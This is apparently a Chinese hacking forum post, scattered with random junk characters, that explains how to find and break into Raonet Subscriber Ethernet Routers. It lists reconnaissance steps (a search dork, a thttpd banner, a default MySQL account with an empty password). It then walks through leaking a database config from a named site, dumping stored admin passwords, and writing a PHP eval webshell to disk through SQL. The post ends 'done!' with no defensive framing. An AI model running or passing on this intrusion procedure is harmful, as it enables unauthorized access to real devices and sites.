寻找存在漏洞的路由器方法:
$ T1 R, R+ x* @6 C, O+ i J
( w9 \9 _1 k$ R# s5 F1:google搜索'Raonet Subscriber Ethernet Router'8 P* u- e% t) G* L: J' o
, M& H( G6 v1 `# j
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
1 O8 n% t' A# v0 J0 Z: k9 |% x) K" _. b$ t/ {
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
! Z4 n# I: A" z3 Q0 x9 d. e" a, u5 y
- E( X$ Q7 p( h& k- W//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
. S5 ?$ |& g. a. d' Q. R1 F$ e+ _2 o3 h0 a, M1 m1 o. x
Z" [. p F+ [
1 P8 P% Y( Z4 g: J* G0 G' d# q# Z/ w入侵步骤:6 l7 r' h1 N# m E' a( m9 {
/ O) R+ P5 e. C6 x
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php7 P3 J& i; g( J6 k8 u2 L6 Q2 |6 z* E
" b* @! U: s3 g% J) L2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc* p! I* }! W! l' d$ }4 s
3:得到密码后连接,查看GUI管理密码:
, h, O' ~8 f# q2 J& y* Guse ser_500- r( R4 G* g/ \8 c( q3 @5 X
select id,passwd from user;8 O) ~9 C& F1 i9 U' T+ o
4:通过数据库写入webshell,执行命令:
$ L( ^) T+ h/ H) b8 s7 |' |! i! @use mysql;
$ v5 Z4 t1 i8 K; }create table ok(cmd TEXT);* f ~/ W3 O+ m5 P
insert into ok values("<?php @eval($_POST[cmd])?>");. W1 I, a, u! t4 o; V3 |
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
) r( u1 s. ?3 ]( b; {, ]! i8 P0 Jdrop table ok;, k* |) Y; c% h+ Q0 ?9 U
) U$ C& t/ m7 }6 L+ c) r7 b5:连接后门shell.php 1 I5 m2 q- u. y/ n
! g* ?3 x/ {" L/ Q) X
6. 搞定!
6 [" l8 P' S2 x/ f/ \" G1 Y: u3 w! M( y- d% R/ ^. K
|